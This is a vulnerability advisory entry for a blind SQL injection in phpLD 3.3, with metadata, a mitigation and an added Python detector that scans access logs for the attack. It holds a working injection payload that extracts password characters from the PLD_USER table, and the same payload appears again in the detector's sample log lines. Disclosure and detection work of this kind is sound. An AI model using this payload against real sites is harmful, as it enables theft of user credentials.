vendor: phpLD
by: milw0rm.com
CVSS: 7.5 HIGH
Blind SQL Injection
CWE: 89
Product Name: phpLD
Affected Version From: 3.3
Affected Version To: 3.3
Patch Exists: YES
Related CWE: N/A
CPE: a:phplinkdirectory:phpld
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
phpLD 3.3 Blind SQL Injection
A Blind SQL Injection vulnerability exists in phpLD 3.3 when magic_quotes_gpc is set to Off and register_globals is set to On. An attacker can exploit this vulnerability by sending a specially crafted request to the page.php file with the 'name' parameter. The attacker can then use a series of True and False requests to extract data from the database. For example, an attacker can use the following request to extract the first character of the password from the PLD_USER table:
(validpagename)' or ORD(MID((SELECT PASSWORD FROM PLD_USER WHERE ID = 1),1,1))>1#
Mitigation:
Ensure that magic_quotes_gpc is set to On and register_globals is set to Off.
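
A defender-side check for the request pattern described above, added here as an example and not part of the original advisory: it scans web access-log lines for page.php requests whose 'name' value contains a quote followed by a boolean operator and a subquery or string function, grouped by client. The log lines are constructed samples, and the function name suspicious_requests and both regexes are assumptions of this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2008:10:00:00 +0000] "GET /page.php?name=about HTTP/1.1" 200 5120',
    '198.51.100.8 - - [01/Jan/2008:10:00:02 +0000] "GET /page.php?name=o%27reilly+and+sons HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2008:10:00:05 +0000] "GET /page.php?name=about%27+or+ORD(MID((SELECT+PASSWORD+FROM+PLD_USER+WHERE+ID+%3D+1),1,1))%3E1%23 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2008:10:00:06 +0000] "GET /page.php?name=about%27%20OR%20ord(mid((select%20password%20from%20PLD_USER%20where%20id%3D1),1,1))%3E1%23 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2008:10:00:09 +0000] "GET /index.php?q=select+a+category HTTP/1.1" 200 900',
]

# client address and request target from a common/combined log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')

# quote, then OR/AND, then a subquery or a string function used for
# character-by-character comparison (case-insensitive)
SQLI_RE = re.compile(
    r"""['"].*\b(?:or|and)\b.*(?:\bselect\b|\b(?:ord|ascii|mid|substr(?:ing)?)\s*\()""",
    re.IGNORECASE | re.DOTALL,
)


def suspicious_requests(lines, script="/page.php", param="name"):
    """Return {client: [decoded parameter values]} for matching requests.

    Only the query string is visible in an access log; with register_globals
    On the same variable can also arrive via POST or a cookie, which this
    check does not see.
    """
    hits = defaultdict(list)
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(script):
            continue
        # parse_qs percent-decodes values and turns '+' into a space
        for value in parse_qs(url.query).get(param, []):
            if SQLI_RE.search(value):
                hits[client].append(value)
    return dict(hits)


if __name__ == "__main__":
    for client, values in suspicious_requests(SAMPLE_LOG).items():
        print(f"{client}: {len(values)} suspicious request(s)")
```

A high count of matching requests from one client in a short window is consistent with the True/False probing the description mentions.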